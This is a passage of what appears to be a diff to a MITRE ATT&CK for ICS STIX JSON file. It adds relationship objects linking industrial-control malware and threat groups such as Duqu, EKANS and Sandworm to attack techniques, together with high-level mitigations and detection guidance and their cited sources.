If not, utilize bump-in-the-wire devices or VPNs to enforce communication authenticity between devices that are not capable of supporting this (e.g., legacy controllers, RTUs).\n", + "source_ref": "course-of-action--c7257b6e-4159-4771-b1f3-2bb93adaecac", + "target_ref": "attack-pattern--2aa406ed-81c3-4c1d-ba83-cfbee5a2847a", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--792324b4-064a-430c-8ffc-7f7acd537778", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Symantec", + "description": "Symantec W32.Duqu The precursor to the next Stuxnet Retrieved. 2019/11/03 ", + "url": "https://docs.broadcom.com/doc/w32-duqu-11-en" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:44:27.955Z", + "description": "[Duqu](https://attack.mitre.org/software/S0038)'s purpose is to gather intelligence data and assets from entities such as industrial infrastructure and system manufacturers, amongst others not in the industrial sector, in order to more easily conduct a future attack against another third party.(Citation: Symantec)", + "relationship_type": "uses", + "source_ref": "malware--68dca94f-c11d-421e-9287-7c501108e18c", + "target_ref": "attack-pattern--b7e13ee8-182c-4f19-92a4-a88d7d855d54", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--59cb471f-ad8b-464f-ab8f-c267f329b0dc", + "created": "2023-03-10T20:30:43.206Z", + "revoked": false, + "external_references": [ + { + "source_name": "Marshall Abrams July 2008", + "description": 
"Marshall Abrams 2008, July 23 Malicious Control System Cyber Security Attack Case Study Maroochy Water Services, Australia Retrieved. 2018/03/27 ", + "url": "https://www.mitre.org/sites/default/files/pdf/08_1145.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-10T20:30:43.206Z", + "description": "In the [Maroochy Water Breach](https://attack.mitre.org/campaigns/C0020), the adversary utilized a computer, possibly stolen, with proprietary engineering software to communicate with a wastewater system.(Citation: Marshall Abrams July 2008)", + "relationship_type": "uses", + "source_ref": "campaign--70cab19e-1745-425e-b3db-c02cd5ff157a", + "target_ref": "attack-pattern--35392fb4-a31d-4c6a-b9f2-1c65b7f5e6b9", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--d90b1271-a90d-41c7-9df7-bec47880c82e", + "created": "2022-09-27T15:33:46.485Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-27T15:33:46.485Z", + "description": "Monitor for user accounts logged into systems they would not normally access or abnormal access patterns, such as multiple systems over a relatively short period of time. Correlate use of login activity related to remote services with unusual behavior or other malicious or suspicious activity. 
[Remote Services](https://attack.mitre.org/techniques/T0886) may be used to access a host’s GUI.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9ce98c86-8d30-4043-ba54-0784d478d0b5", + "target_ref": "attack-pattern--b0628bfc-5376-4a38-9182-f324501cb4cf", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--e607bb66-e53f-4684-b3f1-36a997e27d01", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.087Z", + "relationship_type": "mitigates", + "description": "Protection devices should have minimal digital components to prevent exposure to related adversarial techniques. Examples include interlocks, rupture disks, release valves, etc. (Citation: A G Foord, W G Gulland, C R Howard, T Kellacher, W H Smith 2004) \n", + "source_ref": "course-of-action--8bc4a54e-810c-4600-8b6c-08fa8413a401", + "target_ref": "attack-pattern--83ebd22f-b401-4d59-8219-2294172cf916", + "external_references": [ + { + "source_name": "A G Foord, W G Gulland, C R Howard, T Kellacher, W H Smith 2004", + "description": "A G Foord, W G Gulland, C R Howard, T Kellacher, W H Smith 2004 APPLYING THE LATEST STANDARD FOR FUNCTIONAL SAFETY IEC 61511 Retrieved. 
2020/09/17 ", + "url": "https://www.icheme.org/media/9906/xviii-paper-23.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--c347b69c-e3f6-4eca-ba57-0781c7dc8eac", + "created": "2021-04-13T12:28:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Dragos Threat Intelligence February 2020", + "description": "Dragos Threat Intelligence 2020, February 03 EKANS Ransomware and ICS Operations Retrieved. 2021/04/12 ", + "url": "https://www.dragos.com/blog/industry-news/ekans-ransomware-and-ics-operations/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:48:00.088Z", + "description": "[EKANS](https://attack.mitre.org/software/S0605) masquerades itself as a valid executable with the filename update.exe. Many valid programs use the process name update.exe to perform background software updates. 
(Citation: Dragos Threat Intelligence February 2020)", + "relationship_type": "uses", + "source_ref": "malware--00e7d565-9883-4ee5-b642-8fd17fd6a3f5", + "target_ref": "attack-pattern--ba203963-3182-41ac-af14-7e7ebc83cd61", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--22448288-32d9-4d2c-be16-0784e119fff1", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-08T22:26:11.066Z", + "description": "All field controllers should require users to authenticate for all remote or local management sessions. The authentication mechanisms should also support [Account Use Policies](https://attack.mitre.org/mitigations/M0936), [Password Policies](https://attack.mitre.org/mitigations/M0927), and [User Account Management](https://attack.mitre.org/mitigations/M0918).", + "relationship_type": "mitigates", + "source_ref": "course-of-action--66cfe23e-34b6-4583-b178-ed6a412db2b0", + "target_ref": "attack-pattern--2883c520-7957-46ca-89bd-dab1ad53b601", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--c8a40335-90d6-496a-b4f9-1cc93d3fffc6", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-04-12T17:00:17.249Z", + "modified": "2022-05-06T17:47:24.212Z", + "relationship_type": "mitigates", + "description": "A supply chain management program should include methods the assess the trustworthiness and 
technical maturity of a supplier, along with technical methods (e.g., code-signing, bill of materials) needed to validate the integrity of newly obtained devices and components. Develop procurement language that emphasizes the expectations for suppliers regarding the artifacts, audit records, and technical capabilities needed to validate the integrity of the devices supply chain. (Citation: Robert A. Martin January 2021)\n", + "source_ref": "course-of-action--ac8f3492-7fbb-4a0a-b0b4-b75ec676136c", + "target_ref": "attack-pattern--5e0f75da-e108-4688-a6de-a4f07cc2cbe3", + "external_references": [ + { + "source_name": "Robert A. Martin January 2021", + "description": "Robert A. Martin 2021, January TRUSTING OUR SUPPLY CHAINS: A COMPREHENSIVE DATA-DRIVEN APPROACH Retrieved. 2021/04/12 ", + "url": "https://www.mitre.org/sites/default/files/publications/pr-20-01465-37-trusting-our-supply-chains-a-comprehensive-data-driven-approach.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--e156609f-c30b-4bf5-8a1b-9689ba778a14", + "created": "2023-03-31T17:44:45.164Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Dragos Crashoverride 2018", + "description": "Joe Slowik. (2018, October 12). Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE. 
Retrieved December 18, 2020.", + "url": "https://www.dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-07T17:54:45.912Z", + "description": "During the [2016 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0025), [Sandworm Team](https://attack.mitre.org/groups/G0034) transferred executable files as .txt and then renamed them to .exe, likely to avoid detection through extension tracking.(Citation: Dragos Crashoverride 2018)", + "relationship_type": "uses", + "source_ref": "campaign--aa73efef-1418-4dbe-b43c-87a498e97234", + "target_ref": "attack-pattern--ba203963-3182-41ac-af14-7e7ebc83cd61", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--478cef79-cf4e-4b37-9562-b45cdeb088a4", + "created": "2022-09-26T20:46:23.812Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:30:58.676Z", + "description": "Monitor contextual data about a running process, which may include information such as environment variables, image name, user/owner, or other information that may reveal abuse of system features. 
", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--ee575f4a-2d4f-48f6-b18b-89067760adc1", + "target_ref": "attack-pattern--2dc2b567-8821-49f9-9045-8740f3d0b958", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--5bb313a8-8407-4ec1-a4b0-683ded7f3302", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Daavid Hentunen, Antti Tikkanen June 2014", + "description": "Daavid Hentunen, Antti Tikkanen 2014, June 23 Havex Hunts For ICS/SCADA Systems Retrieved. 2019/04/01 ", + "url": "https://www.f-secure.com/weblog/archives/00002718.html" + }, + { + "source_name": "Kyle Wilhoit", + "description": "Kyle Wilhoit Daavid Hentunen, Antti Tikkanen 2014, June 23 Havex Hunts For ICS/SCADA Systems Retrieved. 2019/04/01 ICS Malware: Havex and Black Energy Retrieved. 2019/10/22 ", + "url": "https://www.youtube.com/watch?v=eywmb7UDODY&feature=youtu.be&t=939" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:19:26.117Z", + "description": "Execution of [Backdoor.Oldrea](https://attack.mitre.org/software/S0093) relies on a user opening a trojanized installer attached to an email. 
(Citation: Daavid Hentunen, Antti Tikkanen June 2014) (Citation: Kyle Wilhoit)", + "relationship_type": "uses", + "source_ref": "malware--083bb47b-02c8-4423-81a2-f9ef58572974", + "target_ref": "attack-pattern--2736b752-4ec5-4421-a230-8977dea7649c", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--ee89466e-0655-4217-844d-fb8ea4f76247", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.065Z", + "relationship_type": "mitigates", + "description": "Filter for protocols and payloads associated with firmware activation or updating activity.\n", + "source_ref": "course-of-action--11f242bc-3121-438c-84b2-5cbd46a4bb17", + "target_ref": "attack-pattern--19a71d1e-6334-4233-8260-b749cae37953", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--ca5c7ae7-5273-4888-bc50-183d6e200972", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.105Z", + "relationship_type": "mitigates", + "description": "Built-in browser sandboxes and application isolation may be used to contain web-based malware.\n", + "source_ref": "course-of-action--059ba11e-e3dc-49aa-84ca-88197f40d4ea", + "target_ref": "attack-pattern--7830cfcf-b268-4ac0-a69e-73c6affbae9a", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": 
"1.0" + }, + { + "type": "relationship", + "id": "relationship--1e6da55a-ab6c-4583-9e20-583f82096497", + "created": "2022-09-26T14:40:01.334Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:49:58.047Z", + "description": "Monitor for new ICS protocol connections to existing assets or for device scanning (i.e., a host connecting to many devices) over ICS and enterprise protocols (e.g., ICMP, DCOM, WinRM).", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a", + "target_ref": "attack-pattern--2fedbe69-581f-447d-8a78-32ee7db939a9", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--38a3c86b-c9bb-4a65-87c9-55429c68684f", + "created": "2022-05-11T16:22:58.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:32:41.938Z", + "description": "Monitor for newly constructed files copied to or from removable media.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c", + "target_ref": "attack-pattern--c267bbee-bb59-47fe-85e0-3ed210337c21", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--383e242a-72d4-4b40-8905-888595c34919", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + 
"external_references": [ + { + "source_name": "Kelly Jackson Higgins", + "description": "Kelly Jackson Higgins How a Manufacturing Firm Recovered from a Devastating Ransomware Attack Retrieved. 2019/11/03 ", + "url": "https://www.darkreading.com/attacks-breaches/how-a-manufacturing-firm-recovered-from-a-devastating-ransomware-attack/d/d-id/1334760" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T18:20:20.608Z", + "description": "An enterprise resource planning (ERP) manufacturing server was lost to the [Ryuk](https://attack.mitre.org/software/S0446) attack. The manufacturing process had to rely on paper and existing orders to keep the shop floor open. (Citation: Kelly Jackson Higgins)", + "relationship_type": "uses", + "source_ref": "malware--a020a61c-423f-4195-8c46-ba1d21abba37", + "target_ref": "attack-pattern--63b6942d-8359-4506-bfb3-cf87aa8120ee", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--ffc5bbce-8d9c-4276-9dc6-efed5c01af8b", + "created": "2017-05-31T21:33:27.074Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Joe Slowik April 2019", + "description": "Joe Slowik 2019, April 10 Implications of IT Ransomware for ICS Environments Retrieved. 2019/10/27 ", + "url": "https://dragos.com/blog/industry-news/implications-of-it-ransomware-for-ics-environments/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:31:37.216Z", + "description": "[Bad Rabbit](https://attack.mitre.org/software/S0606) can move laterally through industrial networks by means of the SMB service. 
(Citation: Joe Slowik April 2019)", + "relationship_type": "uses", + "source_ref": "malware--2eaa5319-5e1e-4dd7-bbc4-566fced3964a", + "target_ref": "attack-pattern--ead7bd34-186e-4c79-9a4d-b65bcce6ed9d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--a91002fe-21b2-4417-9c23-af712a7a035c", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-04-13T11:15:26.506Z", + "modified": "2022-05-06T17:47:24.156Z", + "relationship_type": "mitigates", + "description": "Utilize code signatures to verify the integrity of the installed program on safety or control assets has not been changed.\n", + "source_ref": "course-of-action--71eb7dad-07eb-4bbc-9df0-ac57bf2fba4a", + "target_ref": "attack-pattern--fc5fda7e-6b2c-4457-b036-759896a2efa2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--d08fdedd-12f6-4681-9167-70d070432dee", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.208Z", + "relationship_type": "mitigates", + "description": "Perform inline allowlisting of automation protocol commands to prevent devices from sending unauthorized command or reporting messages. 
Allow/denylist techniques need to be designed with sufficient accuracy to prevent the unintended blocking of valid reporting messages.\n", + "source_ref": "course-of-action--11f242bc-3121-438c-84b2-5cbd46a4bb17", + "target_ref": "attack-pattern--8535b71e-3c12-4258-a4ab-40257a1becc4", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--92d1fd4f-6cc7-4db5-82f8-f8caa5ff59f0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.130Z", + "relationship_type": "mitigates", + "description": "Protect files stored locally with proper permissions to limit opportunities for adversaries to remove indicators of their activity on the system. (Citation: Keith Stouffer May 2015) (Citation: National Institute of Standards and Technology April 2013)\n", + "source_ref": "course-of-action--f9fcb3ec-6de0-4559-8cd9-ef1c0c7d1971", + "target_ref": "attack-pattern--53a26eee-1080-4d17-9762-2027d5a1b805", + "external_references": [ + { + "source_name": "Keith Stouffer May 2015", + "description": "Keith Stouffer 2015, May Guide to Industrial Control Systems (ICS) Security Retrieved. 2018/03/28 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf" + }, + { + "source_name": "National Institute of Standards and Technology April 2013", + "description": "National Institute of Standards and Technology 2013, April Security and Privacy Controls for Federal Information Systems and Organizations Retrieved. 
2020/09/17 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53r4.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--0278ddbc-67d5-444d-8082-bf9974dee920", + "created": "2022-05-11T16:22:58.808Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:47:45.775Z", + "description": "Monitor for an authentication attempt by a user that may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--a953ca55-921a-44f7-9b8d-3d40141aa17e", + "target_ref": "attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--f8318ac4-8ed0-478d-be87-faa2c9d8a740", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Eduard Kovacs May 2018", + "description": "Eduard Kovacs 2018, May 21 Group linked to Shamoon attacks targeting ICS networks in Middle East and UK Retrieved. 
2020/01/03 ", + "url": "https://www.cyberviser.com/2018/05/group-linked-to-shamoon-attacks-targeting-ics-networks-in-middle-east-and-uk/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T16:33:11.305Z", + "description": "[OilRig](https://attack.mitre.org/groups/G0049) has been seen utilizing watering hole attacks to collect credentials which could be used to gain access into ICS networks. (Citation: Eduard Kovacs May 2018)", + "relationship_type": "uses", + "source_ref": "intrusion-set--4ca1929c-7d64-4aab-b849-badbfc0c760d", + "target_ref": "attack-pattern--7830cfcf-b268-4ac0-a69e-73c6affbae9a", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--bc3744d6-9275-4d91-8888-16d5f4d5187b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.112Z", + "relationship_type": "mitigates", + "description": "Use least privilege for service accounts. (Citation: Keith Stouffer May 2015) (Citation: National Institute of Standards and Technology April 2013)\n", + "source_ref": "course-of-action--622fe4d4-0e8e-4d17-9c25-6c9cef1f15d5", + "target_ref": "attack-pattern--32632a95-6856-47b9-9ab7-fea5cd7dce00", + "external_references": [ + { + "source_name": "Keith Stouffer May 2015", + "description": "Keith Stouffer 2015, May Guide to Industrial Control Systems (ICS) Security Retrieved. 
2018/03/28 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf" + }, + { + "source_name": "National Institute of Standards and Technology April 2013", + "description": "National Institute of Standards and Technology 2013, April Security and Privacy Controls for Federal Information Systems and Organizations Retrieved. 2020/09/17 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53r4.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--40f63b01-dc59-475d-826a-74f38c6e81b9", + "created": "2022-05-11T16:22:58.805Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T19:38:28.550Z", + "description": "Host-based implementations of this technique may utilize networking-based system calls or network utility commands (e.g., iptables) to locally intercept traffic. 
Monitor for relevant process creation events.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077", + "target_ref": "attack-pattern--9a505987-ab05-4f46-a9a6-6441442eec3b", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--1110814e-81ff-4a23-9988-4b93e6f68a2b", + "created": "2022-05-11T16:22:58.803Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T15:09:35.145Z", + "description": "Monitor asset alarms which may help identify a loss of communications. Consider correlating alarms with other data sources that indicate traffic has been blocked, such as network traffic. In cases where alternative methods of communicating with outstations exist alarms may still be visible even if reporting messages are blocked. 
", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--4c12c1c8-bcef-4daf-8e5b-fca235f71d9e", + "target_ref": "attack-pattern--3f1f4ccb-9be2-4ff8-8f69-dd972221169b", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--9a607f89-85b8-4fba-8eb7-7e4900ea693f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.203Z", + "relationship_type": "mitigates", + "description": "Network intrusion prevention systems and systems designed to scan and remove malicious email attachments can be used to block activity.\n", + "source_ref": "course-of-action--3172222b-4983-43f7-8983-753ded4f13bc", + "target_ref": "attack-pattern--648f995e-9c3a-41e4-aeee-98bb41037426", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--b452a076-6d4e-49f5-95ac-16264ef05b1d", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Anton Cherepanov", + "description": "Anton Cherepanov BlackEnergy by the SSHBearDoor: attacks against Ukrainian news media and electric industry Retrieved. 
2019/10/29 ", + "url": "https://www.welivesecurity.com/2016/01/03/blackenergy-sshbeardoor-details-2015-attacks-ukrainian-news-media-electric-industry/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:55:23.573Z", + "description": "[KillDisk](https://attack.mitre.org/software/S0607) looks for and terminates two non-standard processes, one of which is an ICS application. (Citation: Anton Cherepanov)", + "relationship_type": "uses", + "source_ref": "malware--e221eb77-1502-4129-af1d-fe1ad55e7ec6", + "target_ref": "attack-pattern--063b5b92-5361-481a-9c3f-95492ed9a2d8", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--34d4101b-b4c9-4ea3-a84d-81e84e7f5033", + "created_by_ref": 